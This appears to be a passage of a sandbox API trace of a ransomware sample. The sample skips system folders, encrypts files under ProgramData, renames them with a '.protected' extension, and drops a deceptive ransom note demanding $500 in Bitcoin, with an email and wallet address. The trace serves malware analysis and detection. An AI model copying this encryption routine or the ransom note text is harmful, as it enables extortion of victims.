lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0076.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 114 [0076.001] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0076.001] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0076.001] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0076.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0076.001] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.001] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.001] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\.") returned 116 [0076.001] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.001] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.002] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.002] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\..") returned 117 [0076.002] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.002] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.002] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0076.002] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.002] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0076.002] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0076.002] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.002] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.002] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.002] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0076.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.003] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0076.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.003] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0076.003] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.047] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.047] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.047] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.047] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.136] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.136] CloseHandle (hObject=0xd8) returned 1 [0076.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 133 [0076.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0076.266] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0076.266] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.266] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0076.266] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0076.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.266] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0076.299] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.318] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.318] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.430] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.430] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.433] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.433] CloseHandle (hObject=0xd8) returned 1 [0076.434] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 150 [0076.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0076.434] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0076.434] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0076.434] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 132 [0076.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0076.482] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.482] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0076.483] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.483] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0076.483] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.483] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0076.483] CloseHandle (hObject=0xd4) returned 1 [0076.484] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0076.484] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0076.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0076.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.484] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.484] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0076.485] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.485] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0076.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.485] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0076.485] CloseHandle (hObject=0xb4) returned 1 [0076.485] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.485] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0076.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.487] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.487] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.488] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.488] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.489] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.489] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.489] CloseHandle (hObject=0xa4) returned 1 [0076.489] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Windows") returned -1 [0076.489] lstrcmpiW 